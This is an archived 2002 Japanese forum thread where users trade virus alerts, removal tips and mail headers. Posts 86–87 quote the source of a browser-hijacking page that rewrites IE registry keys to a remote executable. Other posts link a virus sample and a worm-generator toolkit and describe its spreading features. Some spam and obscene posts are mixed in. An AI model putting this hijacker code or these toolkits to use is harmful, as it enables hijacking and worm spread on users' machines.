5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

☆ウィルス情報&質問 総合スレッド☆part2

1 : ◆tHfDbgsU :02/03/23 15:06
ウィルスに関わる話題・質問はこちらに

IPAセキュリティセンターhttp://www.ipa.go.jp/security/isg/virus.html
Symantec Security Response http://www.symantec.com/region/jp/sarcj/
Trend Micro ウイルス情報 http://www.trendmicro.co.jp/virusinfo/index.asp
McAfee ウイルス情報 http://www.nai.com/japan/virusinfo/vinfo.asp
オンラインウイルス検索http://housecall.antivirus.com/housecall/start_jp.asp

[関連リンク]過去ログ・関連スレ等>>1-20あたり 補足>>1-50

・ウィルス用ソフトを入れて無い人は(知識や技術のある人を除いて)速やかに入れましょう

(win)[Ctrrl]+{F}キー (mac){コマンド}+{F}キーを押すとページ内検索が出来ます
このスレや過去スレの過去ログを検索してから質問してください

2 :名無しさん@お腹いっぱい。:02/03/23 15:13
過去スレhttp://pc.2ch.net/test/read.cgi/sec/999636595/l50
☆ウィルス情報&質問 総合スレッド☆ http://pc.2ch.net/test/read.cgi/sec/1010948022/l50

Symantec Security Check
http://security2.norton.com/SSC/GetBrowser.asp?pkj=TICCYSHSFVIGMKIIPLB&scantype=2&plfid=20&langid=jp&venid=sym&from=/ssc/lunavbrk.asp
オンラインウイルス検索http://housecall.antivirus.com/housecall/start_jp.asp

[ウィルス対策ソフト]
【ノートン】インターネットセキュリティ2002 Ver.7 http://pc.2ch.net/test/read.cgi/sec/1016506322/l50
ウイルスバスター2002 Part3 http://pc.2ch.net/test/read.cgi/sec/1016076378/l50
マカフィーってだめなの!PART3 (不明)
がんばれ!!ウイルス警備隊V3 http://pc.2ch.net/test/read.cgi/sec/1005442785/l50

[ウィルス対策ソフト(無料)]
無料AntiVirus【AntiVirPE/AVG/Antidote簡易版】http://pc.2ch.net/test/read.cgi/sec/1015584020/l50
H+BEDV Antivir Personal Edition Part2 http://pc.2ch.net/test/read.cgi/sec/1016561367/l50
AVG Anti-Virus http://pc.2ch.net/test/read.cgi/sec/1001835534/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50

3 :名無しさん@お腹いっぱい。:02/03/23 15:13
「森で遊ぼう」
(ファイヤーウォールソフト・無料ウィルス用ソフト等セキュリティ関係解説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/


・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)は危ないと感じた人達へ
ネスケ(ネットスケープコミュニケータ)を使用するという手段があることも念頭にいれておいてください
http://home.netscape.com/ja/

4 :名無しさん@お腹いっぱい。:02/03/23 15:14
新種のウィルスが流行したときは専用スレのリンクよろしくお願いします

「Nimda !! 」【その4】 http://pc.2ch.net/test/read.cgi/sec/1001864573/l50
猛威をふるう BADTRANS.B Re: メール (4通目)http://pc.2ch.net/test/read.cgi/sec/1008355163/l50
HDぜんぶ消去した上ズタズタに!!ウィルス http://pc.2ch.net/test/read.cgi/sec/1001662997/l50
Flashムービーに感染するウィルスが登場! http://pc.2ch.net/test/read.cgi/sec/1010564675/l50
'code red'wormに続きw32/sircam http://pc.2ch.net/test/read.cgi/sec/995726416/l50
W32.Aliz.Wormって何? http://pc.2ch.net/test/read.cgi/sec/1006266327/l50
またIEにセキュリティホール! http://pc.2ch.net/test/read.cgi/sec/1008610094/l50
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50
WORM_GONE.A http://pc.2ch.net/test/read.cgi/sec/1007514716/l50
Mac用ウイルス対策ソフト http://pc.2ch.net/test/read.cgi/sec/1007675941/l50
virus下さい。http://pc.2ch.net/test/read.cgi/sec/996909531/l50
みんなでウイルスつくろうよ!!http://pc.2ch.net/test/read.cgi/sec/1008248305/l50 
[初心者必見]分かりやすいnimda対策ページhttp://pc.2ch.net/test/read.cgi/sec/1001407163/l50
ウィルスくれよ。サーカムとか。http://pc.2ch.net/test/read.cgi/sec/996425178/l50
コードレッドパート5 日本政府は反省汁http://pc.2ch.net/test/read.cgi/sec/997783469/l50
KDMEMPKD.EXEってなに? http://pc.2ch.net/test/read.cgi/sec/1011333304/l50
怪奇画像(怖い女)が一定感覚で現れる症状 http://pc.2ch.net/test/read.cgi/hack/1011083919/l50
気持ち悪い女の顔がhttp://pc.2ch.net/test/read.cgi/sec/1012037926/l50
今日最新のウイルスって・・・!!(Myparty) http://pc.2ch.net/test/read.cgi/sec/1012220835/l50
HDぜんぶ消去した上ズタズタに!!ウィルス 2台目http://pc.2ch.net/test/read.cgi/sec/1012296560/l50
破損、トロイ、ウィルス入り 4 http://tmp.2ch.net/test/read.cgi/download/1016806114/l50
【ネット】『C』で記述した初のウイルスが登場http://news.2ch.net/test/read.cgi/newsplus/1015048480/l50
ダイヤルQ2か国際電話に接続を切り替えるやつhttp://pc.2ch.net/test/read.cgi/isp/1010717649/
<IT>CからZドライブを全て上書きするFinal Fantasyワームhttp://news.2ch.net/test/read.cgi/newsplus/1015938003/l50

5 :cheshire-cat:02/03/23 15:48
検索窓にファイル名等を入力して利用。
基本中の基本だけど、ワクチンベンダーごとに、ウイルスの命名は違う。

Symantecウイルス辞典日本語版
http://www.symantec.com/region/jp/sarcj/vinfodb.html
Symantecウイルス辞典英語版(日本語版と微妙に内容が異なる事がある)
http://www.symantec.com/avcenter/vinfodb.html

TrendMicroウイルス情報
http://www.trendmicro.co.jp/vinfo/

McAFEEウイルス情報
http://vil.mcafee.com/default.asp?

6 :名無しさん@お腹いっぱい。:02/03/23 17:45
【ウィルス警報】patch.exeに注意しる!http://pc.2ch.net/test/read.cgi/sec/1016082075/l50

7 :名無しさん@お腹いっぱい。:02/03/23 19:20
おつかれー。>>1

ところで、ウィルスソフトベンダのページにある情報って、感染時の症状と
駆除方法が主で、アンチウィルスソフトがない状態でどんなウィルスか
見分けるための情報があんまり載ってないんだけど、たとえば、Hybris は
Content-Type: multipart/mixed; boundary="--VE**********"
というヘッダがあって、添付ファイル名が AB****AB.EXE だとか、
Content-Type: multipart/mixed; boundary="Boundary-a8dfidaoRadvfuck"
というヘッダがついていれば FBound だとか、こういう特徴を集めたページって
どこかにありませんかね?

8 :名無しさん@お腹いっぱい。:02/03/24 00:31
セキュリティ問題の修正プログラム - 2002 年 3 月 4 日
ダウンロード サイズ: 5.2 MB, 3 分
この修正プログラムによって、Windows XP および Windows Millennium Edition
(以下、Windows Me) の Microsoft virtual machine (Microsoft VM) に存在する
「Java アプレットがブラウザ トラフィックをリダイレクトする」脆弱性
(セキュリティ番号 MS02-013) が修正されます。
今すぐダウンロードして、不正に作成された Java プログラム (アプレット)
によって、ブラウザ トラフィックがアプレットのホストへユーザーに気づかれないように
転送されることがないようにしてください。


9 :名無しさん@お腹いっぱい。:02/03/24 00:40
下の三つのリンク死んでるよー。
次に立てる時は入れないように注意してね。

--
KDMEMPKD.EXEってなに? http://pc.2ch.net/test/read.cgi/sec/1011333304/l50
【ネット】『C』で記述した初のウイルスが登場http://news.2ch.net/test/read.cgi/newsplus/1015048480/l50
ダイヤルQ2か国際電話に接続を切り替えるやつhttp://pc.2ch.net/test/read.cgi/isp/1010717649/
--

10 :名無しさん@お腹いっぱい。:02/03/24 00:57
>>9
大丈夫 dat落ちしてるだけです
しばらく寝かせておけばhtml化されます

11 :名無しさん@お腹いっぱい。:02/03/24 01:07
<IT>ご注意!チェック済み装うウイルス「マイライフB」http://news.2ch.net/test/read.cgi/newsplus/1016802914/l50

12 :名無しさん@お腹いっぱい。:02/03/24 01:21
ADSLユーザーにも 国際電話発信トラブルhttp://pc.2ch.net/test/read.cgi/sec/1016106504/l50

13 :名無しさん@お腹いっぱい。:02/03/24 01:22
【勝手にDLし勝手に実行!ひとりエッチ上手なIE6】http://pc.2ch.net/test/read.cgi/sec/1016485189/l50

14 :名無しさん@お腹いっぱい。:02/03/24 01:23
IE5・5と6・0、ネット閲覧ソフトに欠陥http://pc.2ch.net/test/read.cgi/sec/1005605775/l50

15 :名無しさん@お腹いっぱい。:02/03/24 01:27
【ウィルス警報】patch.exeに注意しる!http://pc.2ch.net/test/read.cgi/sec/1016082075/l50

16 :名無しさん@お腹いっぱい。:02/03/24 01:27
まぁ待てや。
話を整理する人間がいないのにリンクだけをビシバシ貼り付けられても
今ひとつ、というか今みっつ役にたたんのだが。
というか、ここはウィルス情報 & 質問スレだ。

17 :名無しさん@お腹いっぱい。:02/03/24 01:28
PE_Mtx.A, WORM_MTX.A に犯されました。http://pc.2ch.net/test/read.cgi/sec/1015939831/l50
(出戻り)

18 :名無しさん@お腹いっぱい。:02/03/24 01:29
開いただけでウイルスに感染するページhttp://pc.2ch.net/test/read.cgi/sec/994847789/l50

19 :名無しさん@お腹いっぱい。:02/03/24 01:40
>>7
まだ前スレが現役だから質問は前スレでお願いします
http://pc.2ch.net/test/read.cgi/sec/1010948022/l50

20 :19:02/03/24 01:42
と思ったら 気づいたら951越えてるし
余計なこと言ったかな・・・

21 :名無しさん@お腹いっぱい。:02/03/24 01:46
>>19
現役なのはまずいので、とっとと沈めてしまいたいのですが。

22 :助けてください:02/03/24 02:49
ウィルスに感染していることは間違い無いようです。
しかし、ノートン先生(NIS2002)の最新版(LIVE UPDATE済)でも、
シマンテックやトレンドマイクロのオンラインスキャンでも、
ウィルスは検出されません。
ファイル名は判っています。
C:windows\system32\svchost.exeです。
不定期にインターネットにアクセスします。
BlueCodeやSMALLFEGでもないようです。
レジストリ
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
で削除する対象が見つからないので。
OSはXPです。
CTRL+ALT+DELでプロセスを確認すると、SVCHOST.EXEが4つあります。
ユーザー名は
・SYSTEM2つ
・LOCAL SERVICE
・NETWORK SERVICE
で、強引にプロセスの終了をすると、WINDOWSがシャットダウンします。
誰かわかる方がいらっしゃれば、駆除方法をご教授ください。

23 :名無しさん@お腹いっぱい。:02/03/24 03:00
>>22
http://www.google.co.jp/search?hl=ja&q=svchost.exe+XP+%83C%83%93%83%5E%81%5B%83l%83b%83g%81@%90%DA%91%B1&lr=lang_ja

24 :名無しさん@お腹いっぱい。:02/03/24 03:04
>>22
svchost全部殺せばwindowsがシャットダウンするのは当然。
つーか、ウィルスでも何でもない。

25 : :02/03/24 04:27
yahooチャットで親友だと思っていた人にIP抜かれました(涙
その人のIP抜き返したいのですが、どうすればよいのでしょうか?
ノートン インターネットセキュリティーでもわかるでしょうか?
    

26 :名無しさん@お腹いっぱい。:02/03/24 04:35
>>25
IP抜き返した後にどんな行動するつもりか聞かせてくれれば教えたる。

27 :名無しさん@お腹いっぱい。:02/03/24 04:37
マルチし過ぎ

28 :  :02/03/24 04:38
えぇ〜と
たんに、そいつに「IPの抜きかたわかったぞ!!」って
そいつにメールする(そいつのIPも買いて)

29 :  :02/03/24 04:40
教えてくれないのですか?


30 :名無しさん@お腹いっぱい。:02/03/24 05:07
>>25
 スレ違い。IP知られたくないんならチャットすんなよ(´ー`)y-~~

31 :名無しさん@お腹いっぱい。:02/03/24 05:13
 スマソ、IPじゃなくてIPアドレスな(´ー`)y-~~

32 :cheshire-cat:02/03/24 09:57
洋物をCD-Rに焼こうとして、セカンドマシンにファイルを移動させたら。
間違って拾い物のEXEファイルも一緒に。
気付かずに何気に実行してまった(鬱

ノートン、今なんだか検出力弱くない?
リアルタイムスキャンで引っかからなかったんだけど。
アプデート失敗してたかな。

漏れだけ?

33 : :02/03/24 13:08
>>32
リアルタイムスキャン? オンラインスキャンのこと?
そんなもんに頼ってるの?

34 :cheshire-cat:02/03/24 13:52
>>33
リアルタイムスキャン=常駐スキャンの意味で、用語を使ったんだけど。
それに依存はしていない。でも最後の砦みたいな。
NT系だから常駐させても動作はさほど重くないよ、メモリー多ければ。

ファイルをフォルダごと検索してもウイルス検出されなかったのが、ダブルクリックしたら検出、なんて事もよくあるからね。

それと、オンラインスキャンは使ってない。

35 : :02/03/24 14:19
>>33
アプデートと言ってるぐらいだから違うと思われ。

36 : :02/03/24 15:56
やっぱこれ↓がもの凄く理解不能だ。

>リアルタイムスキャン? オンラインスキャンのこと?

どう考えたらこうなるんだか…まさしく謎ですな。
それとも「オンラインスキャンは信用できない」ようなところにテーマをもっていくところからして、
なにかオンラインスキャンに恨みでもあるのだろうか。感染してんのに検出してくれなかったとか。

それでもないのに勝手に「そんなもん」呼ばわりとはなかなかのツワモノですな(w
かくいう俺もオンラインスキャンは使っていないが、web上に必要なサービスのうちの一つだと思うんだがなぁ・・・

37 : :02/03/24 16:19
>>36
別に理解してくれなくて結構よ

38 :名無しさん@お腹いっぱい。:02/03/24 16:43
>>36
ただ単に間違えただけじゃないのか?

半角も全角もマターリしる

39 :名無しさん@お腹いっぱい:02/03/24 17:27
>>36
それは>>33にしか理解できない



40 :名無しさん@お腹いっぱい:02/03/24 17:30
すいませんマターリしましょう

41 :名無しさん@お腹いっぱい。:02/03/24 21:11
 

42 :横レスですが:02/03/24 21:20
すいません。
情報システム板の者です。

情報システム板に、
「セキュリティ企業に入ってクラッカーをやりたかった」
 http://mentai.2ch.net/test/read.cgi/infosys/1016970109/
などと言い出すトンデモ君が現れたので、
諸兄のお力で、小一時間程説教をしていただけないでしょうか?

43 :名無しさん@お腹いっぱい。:02/03/24 21:40
>>42
こういうのは放置が一番ですよ。

44 :cheshire-cat:02/03/24 21:43
>>42
ここってウイルススレなんだけど。
ホスティングサービスの一環として、それ系の企業に依頼して、自社鯖をハッキングしてもらうサービスってあるけど。

45 :cheshire-cat:02/03/24 21:48
あ、漏れ勘違いしてた。

46 :42:02/03/24 22:20
申し訳ありません、他のスレに御質問を書くべきでした。

>>44 タイガー・チーム、とか、セキュリティ検査とか言いませんか?

47 :名無しさん@お腹いっぱい。:02/03/24 22:24
>>46
>>42は質問だったのか?荒らし依頼にしかみえないんだが。

48 :42:02/03/24 22:34
>>47 違いますが... もっと、きちんとした説明をすればよかったですね。

49 :名無しさん@お腹いっぱい。:02/03/24 23:47
弟のPCをいぢってたら、C:WINDOWS\KILL.EXEとかゆーのがあったんですけど、何者ですか?
コワヒ…。

50 :名無しさん@お腹いっぱい。:02/03/25 01:16
フリーメールに差出人不明の空メールが送られてきました。
これってどんなやつ?

51 :名無しさん@お腹いっぱい。:02/03/25 01:33
>>50
そんなやつ。

52 :名無しさん@お腹いっぱい。:02/03/25 01:33
>>49
弟に聞いてください。

53 :名無しさん@お腹いっぱい。:02/03/25 01:36
>>51 知識の無い人には聞いていません。引っ込んでてください。(しかもつまらないです)

54 :名無しさん@お腹いっぱい。:02/03/25 01:38
>>50
どんなやつってどんなやつ?

55 :名無しさん@お腹いっぱい。:02/03/25 11:57
本日送られてきたメール、ヘッダはこれで
Received: by mail55.nifty.com id 3c9e513d588e20;
Mon, 25 Mar 2002 07:20:45 +0900
Received: from Mbuduvrpc
by mail532.nifty.com (8.12.2/3.7W-02/25/02) with SMTP id g2OMKMHC019082
for <*****@**.****.ne.jp>; Mon, 25 Mar 2002 07:20:23 +0900
Date: Mon, 25 Mar 2002 07:20:22 +0900
Message-Id: <200203242220.g2OMKMHC019082@mail532.nifty.com>
From: roko-k <roko-k@jp-d.ne.jp>
To: *****@**.****.ne.jp
Subject: Meeting notice
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary=Z4ci9iB2997611io1W21782I268
Status: U
X-UIDL: 1017008445.22670.mailbox

中身はHTMLメールで、添付ファイルにTARGET.EXE。
ソースは以下のようなものが来たのですが…
ウイルスなのか、アダルト系の怪しいメールなのか。
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<iframe src=3Dcid:Z8HWiwXrl0Z7q height=3D0 width=3D0>
</iframe>
<FONT></FONT></BODY></HTML>

--Z4ci9iB2997611io1W21782I268
Content-Type: audio/x-midi;
name=TARGET.exe
Content-Transfer-Encoding: base64
Content-ID: <Z8HWiwXrl0Z7q>

56 :名無しさん@お腹いっぱい。:02/03/25 12:16
>>55
長いコピーの貼りつけ要らないよ。
邪魔。

57 :名無しさん@お腹いっぱい。:02/03/25 12:17
>>55
ひとりごと?

58 :Win32.Mimee :02/03/25 14:56
http://www.ebcvg.com/binary2.php

Win32.Mimee
http://www.ebcvg.com/sections/binary/Win32.Mimee.zip
−−−−−
short description :
w32.mimee is written in visual basic 6 and targets .eml files... when executed, it spawns
mime.exe in c:\, searches for .eml in harddrive and infects them by adding itself as an
attachment.. .eml files which are saved in rich text (html), whether or not they contain
attachments, will be successfully infected by w32.mimee... .eml files that are saved in plain
text and are having one or many attachments will also be infected by the virus... .eml files
that are saved in plain text and are containing no attachments won't be successfully infected...

win32.mimee inserts a signature in files that it infects so they won't be reinfected..
no registry modifications are made by the virus...

written just to personally discover the possibility of infecting .eml files...
alcopaul
03/07/2002
−−−−−
Symantec Security Response Automation システムは提出されたファイルを分
析しましたが、悪意があるコードを見つけませんでした。
もし我々に提出したファイルで感染した疑いがあるならば、テクニカルサポー
トにご連絡してください。

59 :名無しさん@お腹いっぱい。:02/03/25 14:59
邪魔

60 :名無しさん@お腹いっぱい。:02/03/25 15:01
邪魔
邪魔
邪魔
邪魔
邪魔
邪魔
邪魔
邪魔
邪魔
邪魔

61 :名無しさん@お腹いっぱい。:02/03/25 15:14
>49=53
http://www.google.co.jp/search?q=cache:wpGJV47--JEC:www.fukumi.co.jp/tips/win_nt_rk.htm+C:WINDOWS+KILL.EXE&hl=ja&lr=lang_ja

検索しような・・・・・

62 :名無しさん@お腹いっぱい。:02/03/25 15:20
>>61 素人は黙れ。ここは上級者が初級者に教えてやるスレなんだよ。ホーケー野郎が

63 :名無しさん@お腹いっぱい。:02/03/25 15:31
>62
で?

64 : :02/03/25 16:02
>>62
ホーケー
http://videovirgin.com/users/gleb/tgp1/eve/pics/010.jpg
http://videovirgin.com/users/gleb/tgp1/eve/pics/011.jpg
http://videovirgin.com/users/gleb/tgp1/eve/pics/012.jpg
http://videovirgin.com/users/gleb/tgp1/eve/pics/013.jpg
http://videovirgin.com/users/gleb/tgp1/eve/pics/014.jpg
http://videovirgin.com/users/gleb/tgp1/eve/pics/015.jpg
http://videovirgin.com/users/gleb/tgp1/eve/pics/016.jpg

65 : :02/03/25 16:07
>>59
Сифилис передается половым путем. Бытовым сифилисом
в основном заражаются дети при условии тесного контакта
с больными родителями. Да и то, если только у них есть
заразные проявления на слизистых оболочках рта, на губах.
Никакими рукопожатиями подхватить болячку нельзя. Чтобы
это сделать, придется как минимум расковырять язвочку.
Что касается поцелуев, то если нет поражений слизистой во рту,
целуйтесь на здоровье. Таблетки как средство профилактики
и лечения не применяются. Защита, как всегда,
- презерватив или антисептики (гибитан, мирамистин).


66 :名無しさん@お腹いっぱい。:02/03/25 17:41
>>65
なるほど、あなたもそうなんですか。
実は私もIE6使ってると途中でアイコンが黒ぬき白抜きになって
ハングアップしてしまいます。これってウイルスの仕業なのか単に
別のソフトとの相性が悪いのか私もわからないんです。
脳トン先生に調べてもらっても検出されません。
誰かわかる方教えてください。
ドイツの方でもアフリカの方でもかまいません。
かまいません。


67 : :02/03/26 20:21
 

68 :名無しさん@お腹いっぱい。:02/03/26 20:39
月に一度くらいの頻度で、前触れもなく
HDDに激しくアクセスして、音楽が鳴り出して
操作不能になるんですが、これってウイルスの仕業なのでしょうか?
チェックには引っかからないんですが。
なにか情報ありませんか?

69 :名無しさん@お腹いっぱい。:02/03/26 20:42
本体無しで添付書類IMG_0135.JPGだけのメールが届きます。
受信してる時は2メガくらいありますが、書類は33kです。
書類は開きません。

本文無しとかじゃなくて、本体無し。メールが届いた形跡が無いのです。
そのうえ何回受けてもサーバーのメールフォルダから消えません。

フォルダを一度削除して、もう一度作り直してみたんだけど、
また(まだ?)そんな感じになってます。
ウィルスなのかなんなのか分からないんですけど、
もう完全にお手上げなのでなにか心当たりがあったら教えてください。
お願いします。

70 :名無しさん@お腹いっぱい。:02/03/26 21:40
konnichiwa
kono syashin mite ne !!!!!!

というメッセージがアドレス帳に登録した人全員に送信されてるんですが、
このウイルスが何かわかりますかね?
ちょいと依頼を受けたのですが、あまりに資料が少なすぎるというか…。
あとは、IE6がおかしくなったらしいです。
OEを起動するたびにメールは送信されるとのこと。
がんばって調べているのですがどうもうまく探せずという有様。

心当たりがある方、よければ情報および資料サイト教えていただけないでしょうか。

71 :70:02/03/26 21:49
Return-Path: <****@******>
Delivered-To: ***@********
Received: (qmail 2015 invoked from network); 25 Mar 2002 01:54:48 -0000
Received: from ********* (HELO *****.***.**.***) (210.171.*.***)
by ii23.dico.co.jp with SMTP; 25 Mar 2002 01:54:48 -0000
Received: from pcvlseries (hccd37dcae4.bai.ne.jp [211.125.202.228])
by ****.**.**.jp (8.11.4/3.7W) with SMTP id g2P1siJ15350
for <***@********>; Mon, 25 Mar 2002 10:54:44 +0900 (JST)
From: "Leo Nishimitsu" <*****@********>
To: "=?iso-2022-jp?B?GyRCQjxFRDd7QkBPOhsoQg==?=" <***@*******>
Subject: konnichiwa
Date: Mon, 25 Mar 2002 10:44:44 +0900
Message-ID: <001b01c1d39e$a3c56240$e4ca7dd3@****>
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-2022-jp"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

ヘッダです。ちなみに、添付ファイルはありませんでした。

72 :名無しさん@お腹いっぱい。:02/03/26 21:52
>>70
まず、オンラインスキャン。

73 :名無しさん@お腹いっぱい。:02/03/26 22:12
IEStartっていうウイルスに感染しました。
マカフィーのウイルススキャンを事前にインストールしてたんだけど
ウイルス発見のウインドウが出てきて駆除ボタンを押したら
削除に成功しました。ってなったんで一安心。
でスタートページの設定を元に戻して再起動をかけると
またエロページに繋がっちゃうんです。
何度やっても駄目なんですけどどうしたら(・∀・)イイ!! か教えて欲しいです。

74 :名無しさん@お腹いっぱい。:02/03/26 22:13
>>68 まずはウィルススキャン。特定の日に発病なら以下参照。
http://www.symantec.com/region/jp/sarcj/calendar/mar_2002.html

75 :名無しさん@お腹いっぱい。:02/03/26 22:27
>>73
1.[スタート]−[ファイル名を指定して実行] から msconfig を起動する。
2.[スタートアップ] タブをクリックし、上半分の行のチェックを解除し
て「OK」をクリックする。
3.Windows を再起動する。
4.問題が解消した場合、上半分のいずれかの行が問題なので、2. で解除
したチェックを半分戻して Windows を 再起動する。
問題が続く場合、下半分のいずれかの行が問題なので、残ったチェックの
さらに半分を解除して Windows を再 起動する。
5.上記を繰り返して問題の行を特定する。
6.特定した行のチェックを外し、他を元の状態にすればOK。できれば特
定したファイルを削除。

76 :70:02/03/26 22:30
>>72
ネット接続もできないらしいです。
送信されるメールのヘッダとメッセージから調べるのはやはり不可能でしょうか…

なんか、厨房具合を肩代わりしてる俺。
堪忍してください。

77 :名無しさん@お腹いっぱい。:02/03/26 22:39
>>76 アンチウィルスソフト買いに行け!

78 :インターネット=ソープランドのマンコ:02/03/26 23:01
ナマでパコパコ!!!!
インターネット=ソープランドのマンコ
パソコン=チンコ

これでもナマでヤリますか?

淋、蔵まみれになりますか?


79 :cheshire-cat:02/03/26 23:28
>>69
メーラー何よ、一体。。。。
ウイルスメール受信後に感染すると、最初にとどいた本体を削除するVilliもあった気がするけど、忘れた。でもそれじゃなさそうだし。

ひょっとして、本文等にウイルスがくっついているのを、アンチウイルスソフトのメール保護機能が検知して削除したんだけど、サーバーにそのメールが残っているって話かな。Badtrans.B等でたまにある。

OEでパッチ無しという前提で書くけど(とりあえず)。
メーラーのプレビューウインドウを使わないように設定。
メーラーの設定から、受信したメールをサーバーに残さないように設定。
アンチウイルスソフトのメール保護機能を使わないように設定。
そして受信。
受信後、そのメールを削除。
アンチウイルスソフトのメール保護機能をオンに戻す。

その「開かない書類」、何なんだろうか。

80 :名無しさん@お腹いっぱい:02/03/26 23:31
>>70

これだね
http://biztech.nikkeibp.co.jp/wcs/show/leaf?CID=onair/biztech/prom/176720


81 :cheshire-cat:02/03/26 23:35
>>76
漏れのリストには無いです。
HTMLメールの本文に「何か」を仕込んでいるのかと思うけど。
メールのソースを見れば、「何か」は載ってるよ、多分。
OEやOutlook利用者なのに、メーラーの設定を制限サイトにしていなかったのかな。

ありきたりだけど、scanreg /restore
(だってさ、どこが変更されているのかわからないんだから、レスしようがない。)
もちろんアンチウイルスソフトの利用も。

82 :cheshire-cat:02/03/26 23:39
>>80
チェック漏れ補完、多謝。
vbsって拡張子、使わないなら日頃から外しておけばいいのに、ってよく思う。

83 :(゚ρ゚)アウアー :02/03/26 23:43
>>80
>「アンナ・クルニコワ・ウイルス」の変種である。

VBSWG絡みっちうこときゃ?

んぢゃ、漏れは
件名「itteyoshi」
添付「omaemona.jpg.vbs」でも流すかにょ。

84 :cheshire-cat:02/03/26 23:56
アンナクルニコワ、漏れなら絶対開けそうな名前。
WGで作った奴って、全て自動的に検出できるんじゃなかったっけ、既存のアンチウイルスソフトで。

おやぁ?

85 :70のウイルス:02/03/26 23:59
>>80
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=VBS_LEE.D
VBS/Anjulie.gen@MM, リー, I-Worm.Lee-Based, Bloodhound.VBS.Worm, VBS.VBSWG.GEN

Bloodhoundって用語はバスターも使ってるのか?

また、ワームはInternetExplorerのホームページの設定をアダルトサイトのURL
http://it.geocities.com/windows2it/index.htm
に変更してしまいます。

86 :85のアダルトサイトのソース:02/03/27 00:03
//ActiveX initialization
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();

//some vars
WinDir=Shl.ExpandEnvironmentStrings("%WINDIR%");
myFav=Shl.SpecialFolders("Favorites");
myDesk=Shl.SpecialFolders("Desktop");
myDesk2=Shl.SpecialFolders("Startup");
//create shortcuts & set search & StartPage
SetSrch()
putfav(myFav, myDesk, myDesk2);
//DownloadFile();

87 :86の続き:02/03/27 00:05
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\SearchAssistant", "http://www.kogalu.com/sou/logon/Update.exe");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Search\\CustomizeSearch", "http://www.kogalu.com/sou/logon/Update.exe");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Search Page","http://www.kogalu.com/sou/logon/Update.exe");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Start Page","http://www.kogalu.com/sou/logon/Update.exe");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","http://www.kogalu.com/sou/logon/Update.exe");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","http://www.kogalu.com/sou/logon/Update.exe");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer\\Plugins\\PluginsPage","http://www.kogalu.com/sou/logon/Update.exe");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SafeSites\\ie.search.msn.com","http://www.kogalu.com/sou/logon/Update.exe");
Shl.RegWrite("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\SafeSites\\search.bisextop.com","http://www.kogalu.com/sou/logon/Update.exe");

88 :70のウイルスは日本で作成?:02/03/27 00:08
関 連: IRC_LEE.D
感染報告有無: あり
発病条件 1: ファイル実行時
破壊活動 1: システム改変 :IEのホームページ変更
発見日: 2002/03/25
対応日: 2002/03/25
対応パターンファイル: 250
(パターン番号について)
言 語:
日本語
発見場所:
日本
http://www.trendmicro.co.jp/vinfo/virusencyclo/glossary.asp#place_of_origin

89 :cheshire-cat:02/03/27 00:10
>>85
Bloodhound.VBS.Wormは、Norton利用時に未知VBSウイルスを検出した時に付けられる名前。

90 :(゚ρ゚)アウアー :02/03/27 00:17
>84
うむ。
んぢゃ、直でソースいぢくったのかにょ?
暗号化無しっちうこた、エンクリプタ使ってないにょ。
それかニュース記事自体が少し練りが甘いのかにょ。。
・・・・よくわからんにょ。。。


91 :(゚ρ゚)アウアー :02/03/27 00:21
>>85
んだよ、別名でVBS.VBSWG.GENあるぢゃねか。
・・・・アウアー

92 :cheshire-cat:02/03/27 00:23
>>90
喰らった人がアンチウイルスソフト使っていなかったのか、それともWGの新バージョンが出たのかも。

明日あたりになればわかるかな。
ゴホゴホ(インフルエンザの咳+痰

93 :ウイルス作成ソフト:02/03/27 00:23
>>89
バスターの未知ウイルスの名前は?
−−−−−
Virus Creation Tools (54)
http://vx.netlux.org/dat/vct.shtml
これを使った!!!!!!!!
VBS Worm Generator http://vx.netlux.org/dat/tv07.shtml

Worm backup: It's just for having a copy of the worm in a safe place,
so you can be shure that it will no be lost.
Outlook Replication: Send as attachment: It uses the same function that
all the vbs's, js's or any other kind of worm, it sends a message,
that you can define, whit te worm attached to every preson in the user's address list.
Send in html code: The worm is added to the html code of the message,
so, when the person views it, they'e infected!
Mirc replication: Search for mirc.ini(what means that the mirc is there)
in the most commons floders(programfiles\mirc, c:\mirc, c:\mirc32) and if it is found,
the worm create "script.ini" in that folder,
that script make the mirc sends the worm to every person
that join to a channel. (see "If found Mirc, infect.")
Infect Files: The worm will search for all the hard drives
(and the network drives too, i think) for files whit the extencion
that you want(in this version only .vbs and vbe are searched)
